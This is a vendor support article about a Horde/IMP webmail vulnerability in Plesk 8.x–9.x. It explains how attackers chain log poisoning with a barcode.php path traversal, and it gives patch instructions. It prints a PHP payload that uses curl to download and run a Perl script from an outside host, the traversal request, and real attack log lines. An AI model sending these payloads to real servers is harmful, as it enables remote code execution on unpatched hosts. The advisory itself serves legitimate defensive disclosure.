Search

Language:  
Search for:

Available article translations:

Horde/IMP Plesk Webmail Exploit

Article ID: 113374, created on Feb 26, 2012, last review on Aug 12, 2014

APPLIES TO:
  • Plesk 9.3 for Linux/Unix
  • Plesk 9.2 for Linux/Unix
  • Plesk 9.0 for Linux/Unix
  • Plesk 8.6 for Linux/Unix
  • Plesk 9.3 for Windows
  • Plesk 9.2 for Windows
  • Plesk 9.0 for Windows
  • Plesk 8.6 for Windows

Symptoms

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
Here is what the actual requests the attacker uses and the log entry from the psa-horde.log file would look like:
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

Resolution

Download the appropriate patch for Horde 3.1.7-3.3.2 in accordance with the platform your server runs on. Unzip it, and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:


e1f1e45a2306e896fe0f3413a8626b45 a914db3fdc7a53ddcfd1b2db8f5a1b9c 85a92ca67f2200d36506862eaa6ed6b8 c45acecf540ecd42a4bbfb242ce02b1d 40d2202ee8e3c58205a757e0eb0cbb8e aac4a8fcd879de03758354e15495d69a 7ad0184e3d7b1cf67a6c33b48c452050 31fd77b463b82e861f4fa3ac14168e1e 165ec78c924fabffe1d80dc3eabc98c6 29d1e90fd304f01e6420fbe60f66f838 6ef0db7f1685482449634a455d77d3f4 4f57df935e9acf8d18830757d2346419 9fa0130c84cac4b292697ade62270a40 b8ef5052d936e902043e41759118114e 11a46d8a188d618564f4f0cead9a50f3 56797cefb1efc9130f7c48a7d1db0f0c

FEEDBACK
Was this article helpful?
Tell us how we may improve it.
Yes No
 
 
 
 
 
 
Server Virtualization
- Odin Cloud Server
- Odin Containers for Windows 6.0
- Odin Virtuozzo Containers
Automation
- Odin Automation
- Odin Automation for Cloud Infrastructure
- Odin Business Automation Standard
- Odin Virtual Automation
- Odin Plesk Panel Suite
- Web Presence Builder
- Odin Plesk Automation
- Odin Small Business Panel
- Value-added Services for Hosters
- Odin Partner Storefront
Services & Resources
- Cloud Acceleration Services
- Professional Services
- Support Services
- Training & Certification